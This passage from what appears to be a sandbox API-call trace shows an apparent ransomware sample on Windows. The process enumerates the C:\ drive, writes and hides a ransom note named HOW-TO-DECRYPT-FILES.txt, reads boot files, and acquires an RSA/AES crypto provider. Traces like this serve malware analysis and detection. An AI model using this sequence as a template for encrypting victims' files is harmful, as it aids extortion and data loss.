[5]=0x7f, [6]=0x20, [7]=0xd3))) returned 0x0 [0044.318] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xe0492320, Data2=0x9956, Data3=0x4dc5, Data4=([0]=0x85, [1]=0x4a, [2]=0x88, [3]=0x63, [4]=0xab, [5]=0x38, [6]=0x13, [7]=0x7f))) returned 0x0 [0044.318] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x9a9243cc, Data2=0x367c, Data3=0x4a28, Data4=([0]=0x9a, [1]=0x81, [2]=0xc0, [3]=0x18, [4]=0x59, [5]=0x79, [6]=0xa4, [7]=0x21))) returned 0x0 [0044.318] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x3d419eac, Data2=0x1d73, Data3=0x44f5, Data4=([0]=0xaa, [1]=0xed, [2]=0x9, [3]=0x78, [4]=0xa1, [5]=0xdd, [6]=0x5c, [7]=0x25))) returned 0x0 [0044.324] GetComputerNameW (in: lpBuffer=0x364560, nSize=0x18f020 | out: lpBuffer="CRH2YWU7", nSize=0x18f020) returned 1 [0044.324] GetLogicalDrives () returned 0x4 [0044.324] GetLastError () returned 0xcb [0044.362] CoCreateGuid (in: pguid=0x18eee4 | out: pguid=0x18eee4*(Data1=0x5686c88, Data2=0x13ca, Data3=0x4889, Data4=([0]=0x8e, [1]=0x32, [2]=0x34, [3]=0x73, [4]=0x22, [5]=0x15, [6]=0x79, [7]=0xda))) returned 0x0 [0044.363] GetVersionExW (in: lpVersionInformation=0x352200*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x352200*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0044.363] GetLastError () returned 0xcb [0044.480] GetLogicalDrives () returned 0x4 [0044.480] GetLastError () returned 0x0 [0044.481] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x18eabc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0044.481] GetLastError () returned 0x0 [0044.481] SetErrorMode (uMode=0x1) returned 0x0 [0044.481] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x18efdc | out: lpFileInformation=0x18efdc*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0xf24c7e90, ftLastAccessTime.dwHighDateTime=0x1d30235, ftLastWriteTime.dwLowDateTime=0xf24c7e90, ftLastWriteTime.dwHighDateTime=0x1d30235, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0044.481] GetLastError () returned 0x0 [0044.481] SetErrorMode (uMode=0x0) returned 0x1 [0044.482] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0044.482] GetLastError () returned 0x0 [0044.482] GetLogicalDrives () returned 0x4 [0044.482] GetLastError () returned 0x0 [0044.482] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x18eabc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0044.482] GetLastError () returned 0x0 [0044.482] SetErrorMode (uMode=0x1) returned 0x0 [0044.482] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x18efdc | out: lpFileInformation=0x18efdc*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0xf24c7e90, ftLastAccessTime.dwHighDateTime=0x1d30235, ftLastWriteTime.dwLowDateTime=0xf24c7e90, ftLastWriteTime.dwHighDateTime=0x1d30235, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0044.482] GetLastError () returned 0x0 [0044.482] SetErrorMode (uMode=0x0) returned 0x1 [0044.482] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0044.482] GetLastError () returned 0x0 [0044.505] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0044.505] GetLastError () returned 0x0 [0044.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18ea68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0044.505] GetLastError () returned 0x0 [0044.505] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x18ea1c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0044.505] GetLastError () returned 0x0 [0044.506] SetErrorMode (uMode=0x1) returned 0x0 [0044.507] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3605a0 [0044.507] GetLastError () returned 0x0 [0044.507] FindNextFileW (in: hFindFile=0x3605a0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.507] GetLastError () returned 0x0 [0044.508] FindNextFileW (in: hFindFile=0x3605a0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.508] GetLastError () returned 0x0 [0044.508] FindNextFileW (in: hFindFile=0x3605a0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.508] GetLastError () returned 0x0 [0044.508] FindNextFileW (in: hFindFile=0x3605a0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.508] GetLastError () returned 0x0 [0044.508] FindNextFileW (in: hFindFile=0x3605a0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.508] GetLastError () returned 0x0 [0044.508] FindNextFileW (in: hFindFile=0x3605a0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.508] GetLastError () returned 0x0 [0044.508] FindNextFileW (in: hFindFile=0x3605a0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.508] GetLastError () returned 0x0 [0044.509] FindNextFileW (in: hFindFile=0x3605a0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.509] GetLastError () returned 0x0 [0044.509] FindNextFileW (in: hFindFile=0x3605a0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.509] GetLastError () returned 0x0 [0044.509] FindNextFileW (in: hFindFile=0x3605a0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.509] GetLastError () returned 0x0 [0044.509] FindNextFileW (in: hFindFile=0x3605a0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.509] GetLastError () returned 0x0 [0044.509] FindNextFileW (in: hFindFile=0x3605a0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.509] GetLastError () returned 0x0 [0044.509] FindNextFileW (in: hFindFile=0x3605a0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.509] GetLastError () returned 0x0 [0044.510] FindNextFileW (in: hFindFile=0x3605a0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.510] GetLastError () returned 0x0 [0044.510] FindNextFileW (in: hFindFile=0x3605a0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.510] GetLastError () returned 0x0 [0044.510] FindNextFileW (in: hFindFile=0x3605a0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.510] GetLastError () returned 0x0 [0044.510] FindNextFileW (in: hFindFile=0x3605a0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0044.510] GetLastError () returned 0x12 [0044.510] FindClose (in: hFindFile=0x3605a0 | out: hFindFile=0x3605a0) returned 1 [0044.510] SetErrorMode (uMode=0x0) returned 0x1 [0044.510] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x18ea1c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0044.510] GetLastError () returned 0x12 [0044.510] SetErrorMode (uMode=0x1) returned 0x0 [0044.510] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3605a0 [0044.511] GetLastError () returned 0x12 [0044.511] FindNextFileW (in: hFindFile=0x3605a0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.511] GetLastError () returned 0x12 [0044.511] FindNextFileW (in: hFindFile=0x3605a0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.511] GetLastError () returned 0x12 [0044.511] FindNextFileW (in: hFindFile=0x3605a0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.511] GetLastError () returned 0x12 [0044.511] FindNextFileW (in: hFindFile=0x3605a0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.511] GetLastError () returned 0x12 [0044.511] FindNextFileW (in: hFindFile=0x3605a0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.511] GetLastError () returned 0x12 [0044.511] FindNextFileW (in: hFindFile=0x3605a0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.512] GetLastError () returned 0x12 [0044.512] FindNextFileW (in: hFindFile=0x3605a0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.512] GetLastError () returned 0x12 [0044.512] FindNextFileW (in: hFindFile=0x3605a0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.512] GetLastError () returned 0x12 [0044.512] FindNextFileW (in: hFindFile=0x3605a0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.512] GetLastError () returned 0x12 [0044.512] FindNextFileW (in: hFindFile=0x3605a0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.512] GetLastError () returned 0x12 [0044.512] FindNextFileW (in: hFindFile=0x3605a0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.512] GetLastError () returned 0x12 [0044.512] FindNextFileW (in: hFindFile=0x3605a0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.513] GetLastError () returned 0x12 [0044.513] FindNextFileW (in: hFindFile=0x3605a0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.513] GetLastError () returned 0x12 [0044.513] FindNextFileW (in: hFindFile=0x3605a0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.513] GetLastError () returned 0x12 [0044.513] FindNextFileW (in: hFindFile=0x3605a0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.513] GetLastError () returned 0x12 [0044.513] FindNextFileW (in: hFindFile=0x3605a0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.513] GetLastError () returned 0x12 [0044.513] FindNextFileW (in: hFindFile=0x3605a0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0044.513] GetLastError () returned 0x12 [0044.513] FindClose (in: hFindFile=0x3605a0 | out: hFindFile=0x3605a0) returned 1 [0044.513] SetErrorMode (uMode=0x0) returned 0x1 [0044.514] GetFullPathNameW (in: lpFileName="C:\\autoexec.bat", nBufferLength=0x105, lpBuffer=0x18ead0, lpFilePart=0x0 | out: lpBuffer="C:\\autoexec.bat", lpFilePart=0x0) returned 0xf [0044.514] GetLastError () returned 0x12 [0044.515] SetErrorMode (uMode=0x1) returned 0x0 [0044.515] GetFileAttributesExW (in: lpFileName="C:\\autoexec.bat" (normalized: "c:\\autoexec.bat"), fInfoLevelId=0x0, lpFileInformation=0x1b5c478 | out: lpFileInformation=0x1b5c478*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cdb0de4, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x5cdb0de4, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0x54e43b7c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x18)) returned 1 [0044.515] GetLastError () returned 0x12 [0044.515] SetErrorMode (uMode=0x0) returned 0x1 [0044.633] GetFullPathNameW (in: lpFileName="C:\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e97c, lpFilePart=0x0 | out: lpBuffer="C:\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x1b [0044.634] GetLastError () returned 0x12 [0044.634] SetErrorMode (uMode=0x1) returned 0x0 [0044.634] CreateFileW (lpFileName="C:\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x350 [0044.634] GetLastError () returned 0x0 [0044.634] GetFileType (hFile=0x350) returned 0x1 [0044.634] SetErrorMode (uMode=0x0) returned 0x1 [0044.634] GetFileType (hFile=0x350) returned 0x1 [0044.634] WriteFile (in: hFile=0x350, lpBuffer=0x1b802e0*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18eedc, lpOverlapped=0x0 | out: lpBuffer=0x1b802e0*, lpNumberOfBytesWritten=0x18eedc*=0x18da, lpOverlapped=0x0) returned 1 [0044.635] GetLastError () returned 0x0 [0044.635] CloseHandle (hObject=0x350) returned 1 [0044.636] GetLastError () returned 0x0 [0044.636] GetFullPathNameW (in: lpFileName="C:\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18eaa4, lpFilePart=0x0 | out: lpBuffer="C:\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x1b [0044.636] GetLastError () returned 0x0 [0044.636] SetFileAttributesW (lpFileName="C:\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0044.636] GetLastError () returned 0x0 [0044.636] GetFullPathNameW (in: lpFileName="C:\\bootmgr", nBufferLength=0x105, lpBuffer=0x18ead0, lpFilePart=0x0 | out: lpBuffer="C:\\bootmgr", lpFilePart=0x0) returned 0xa [0044.636] GetLastError () returned 0x0 [0044.636] SetErrorMode (uMode=0x1) returned 0x0 [0044.636] GetFileAttributesExW (in: lpFileName="C:\\bootmgr" (normalized: "c:\\bootmgr"), fInfoLevelId=0x0, lpFileInformation=0x1b81efc | out: lpFileInformation=0x1b81efc*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x553cb8a0, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8c441c0, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xc5bd5400, ftLastWriteTime.dwHighDateTime=0x1cb887d, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a)) returned 1 [0044.637] GetLastError () returned 0x0 [0044.637] SetErrorMode (uMode=0x0) returned 0x1 [0044.639] GetFullPathNameW (in: lpFileName="C:\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e97c, lpFilePart=0x0 | out: lpBuffer="C:\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x1b [0044.639] GetLastError () returned 0x0 [0044.639] SetErrorMode (uMode=0x1) returned 0x0 [0044.639] CreateFileW (lpFileName="C:\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0044.639] GetLastError () returned 0x5 [0044.695] SetErrorMode (uMode=0x0) returned 0x1 [0044.695] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x18ead0, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0044.695] GetLastError () returned 0x5 [0044.695] SetErrorMode (uMode=0x1) returned 0x0 [0044.695] GetFileAttributesExW (in: lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), fInfoLevelId=0x0, lpFileInformation=0x1bac074 | out: lpFileInformation=0x1bac074*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x58b95c40, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0x58b95c40, ftLastAccessTime.dwHighDateTime=0x1d2da3e, ftLastWriteTime.dwLowDateTime=0x58b95c40, ftLastWriteTime.dwHighDateTime=0x1d2da3e, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0044.695] GetLastError () returned 0x5 [0044.695] SetErrorMode (uMode=0x0) returned 0x1 [0044.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x18e958, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0044.713] GetLastError () returned 0xb7 [0044.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x18e9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0044.714] GetLastError () returned 0xb7 [0044.714] SetErrorMode (uMode=0x1) returned 0x0 [0044.714] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x18ee20 | out: lpFileInformation=0x18ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e385d07, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x8e385d07, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0x9542db70, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1 [0044.714] GetLastError () returned 0xb7 [0044.714] SetErrorMode (uMode=0x0) returned 0x1 [0044.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x18e97c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0044.714] GetLastError () returned 0xb7 [0044.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x18e908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0044.714] GetLastError () returned 0xb7 [0044.745] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x18e92c | out: pfEnabled=0x18e92c) returned 0x0 [0044.746] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x18ea98, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0044.746] GetLastError () returned 0x0 [0044.746] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x18e96c, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0044.746] GetLastError () returned 0x0 [0044.746] SetErrorMode (uMode=0x1) returned 0x0 [0044.746] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x390 [0044.746] GetLastError () returned 0x0 [0044.746] GetFileType (hFile=0x390) returned 0x1 [0044.746] SetErrorMode (uMode=0x0) returned 0x1 [0044.746] GetFileType (hFile=0x390) returned 0x1 [0044.747] GetFileSize (in: hFile=0x390, lpFileSizeHigh=0x18ef20 | out: lpFileSizeHigh=0x18ef20*=0x0) returned 0x2000 [0044.747] GetLastError () returned 0x0 [0044.747] ReadFile (in: hFile=0x390, lpBuffer=0x1bd1c74, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x18eec8, lpOverlapped=0x0 | out: lpBuffer=0x1bd1c74*, lpNumberOfBytesRead=0x18eec8*=0x2000, lpOverlapped=0x0) returned 1 [0044.761] GetLastError () returned 0x0 [0044.762] CloseHandle (hObject=0x390) returned 1 [0044.762] GetLastError () returned 0x0 [0044.762] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x18ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0044.762] GetLastError () returned 0x0 [0044.762] SetErrorMode (uMode=0x1) returned 0x0 [0044.762] GetFileAttributesExW (in: lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), fInfoLevelId=0x0, lpFileInformation=0x18ef30 | out: lpFileInformation=0x18ef30*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x58b95c40, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0x58b95c40, ftLastAccessTime.dwHighDateTime=0x1d2da3e, ftLastWriteTime.dwLowDateTime=0x58b95c40, ftLastWriteTime.dwHighDateTime=0x1d2da3e, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0044.762] GetLastError () returned 0x0 [0044.762] SetErrorMode (uMode=0x0) returned 0x1 [0044.764] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x18ea9c, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0044.764] GetLastError () returned 0x0 [0044.764] SetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK", dwFileAttributes=0x26) returned 1 [0044.764] GetLastError () returned 0x0 [0044.793] CryptAcquireContextW (in: phProv=0x18ee90, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ee90*=0x37c4e8) returned 1 [0044.794] GetLastError () returned 0x0 [0044.800] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18ee50, dwFlags=0x1 | out: pbData=0x0, pdwDataLen=0x18ee50) returned 1 [0044.800] GetLastError () returned 0x0 [0044.800] CoTaskMemAlloc (cb=0x20) returned 0x3aeb80 [0044.800] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x3aeb80, pdwDataLen=0x18ee50, dwFlags=0x1 | out: pbData=0x3aeb80, pdwDataLen=0x18ee50) returned 1 [0044.800] GetLastError () returned 0x0 [0044.801] CoTaskMemFree (pv=0x3aeb80) [0044.801] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18ee50) returned 1 [0044.801] GetLastError () returned 0x0 [0044.801] CoTaskMemAlloc (cb=0x20) returned 0x3aeb80 [0044.801] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x3aeb80, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x3aeb80, pdwDataLen=0x18ee50) returned 1 [0044.802] GetLastError () returned 0x0 [0044.802] CoTaskMemFree (pv=0x3aeb80) [0044.802] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18ee50) returned 1 [0044.802] GetLastError () returned 0x0 [0044.802] CoTaskMemAlloc (cb=0x20) returned 0x3aeb80 [0044.802] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x3aeb80, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x3aeb80, pdwDataLen=0x18ee50) returned 1 [0044.802] GetLastError () returned 0x0 [0044.802] CoTaskMemFree (pv=0x3aeb80) [0044.802] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18ee50) returned 1 [0044.802] GetLastError () returned 0x0 [0044.802] CoTaskMemAlloc (cb=0x20) returned 0x3aeb80 [0044.802] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x3aeb80, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x3aeb80, pdwDataLen=0x18ee50) returned 1 [0044.802] GetLastError () returned 0x0 [0044.802] CoTaskMemFree (pv=0x3aeb80) [0044.802] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18ee50) returned 1 [0044.802] GetLastError () returned 0x0 [0044.802] CoTaskMemAlloc (cb=0x20) returned 0x3aeb80 [0044.802] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x3aeb80, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x3aeb80, pdwDataLen=0x18ee50) returned 1 [0044.802] GetLastError () returned 0x0 [0044.802] CoTaskMemFree (pv=0x3aeb80) [0044.802] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18ee50) returned 1 [0044.802] GetLastError () returned 0x0 [0044.802] CoTaskMemAlloc (cb=0x20) returned 0x3aeb80 [0044.802] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x3aeb80, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x3aeb80, pdwDataLen=0x18ee50) returned 1 [0044.802] GetLastError () returned 0x0 [0044.802] CoTaskMemFree (pv=0x3aeb80) [0044.802] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18ee50) returned 1 [0044.802] GetLastError () returned 0x0 [0044.802] CoTaskMemAlloc (cb=0x20) returned 0x3aeb80 [0044.802] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x3aeb80, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x3aeb80, pdwDataLen=0x18ee50) returned 1 [0044.802] GetLastError () returned 0x0 [0044.802] CoTaskMemFree (pv=0x3aeb80) [0044.802] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18ee50) returned 1 [0044.802] GetLastError () returned 0x0 [0044.802] CoTaskMemAlloc (cb=0x20) returned 0x3aeb80 [0044.802] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x3aeb80, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x3aeb80, pdwDataLen=0x18ee50) returned 1 [0044.802] GetLastError () returned 0x0 [0044.802] CoTaskMemFree (pv=0x3aeb80) [0044.802] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18ee50) returned 1 [0044.803] GetLastError () returned 0x0 [0044.803] CoTaskMemAlloc (cb=0x20) returned 0x3aeb80 [0044.803] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x3aeb80, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x3aeb80, pdwDataLen=0x18ee50) returned 1 [0044.803] GetLastError () returned 0x0 [0044.803] CoTaskMemFree (pv=0x3aeb80) [0044.803] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18ee50) returned 1 [0044.803] GetLastError () returned 0x0 [0044.803] CoTaskMemAlloc (cb=0x20) returned 0x3aeb80 [0044.803] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x3aeb80, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x3aeb80, pdwDataLen=0x18ee50) returned 1 [0044.803] GetLastError () returned 0x0 [0044.803] CoTaskMemFree (pv=0x3aeb80) [0044.803] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18ee50) returned 1 [0044.803] GetLastError () returned 0x0 [0044.803] CoTaskMemAlloc (cb=0x20) returned 0x3aeb80 [0044.803] CryptGetProvParam 